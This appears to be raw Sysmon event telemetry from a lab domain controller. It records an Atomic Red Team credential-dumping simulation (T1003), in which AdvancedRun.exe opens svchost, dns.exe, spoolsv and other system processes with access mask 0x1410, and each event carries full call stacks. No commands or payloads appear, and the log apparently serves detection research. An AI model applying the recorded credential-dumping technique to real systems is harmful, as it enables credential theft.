exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003942569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
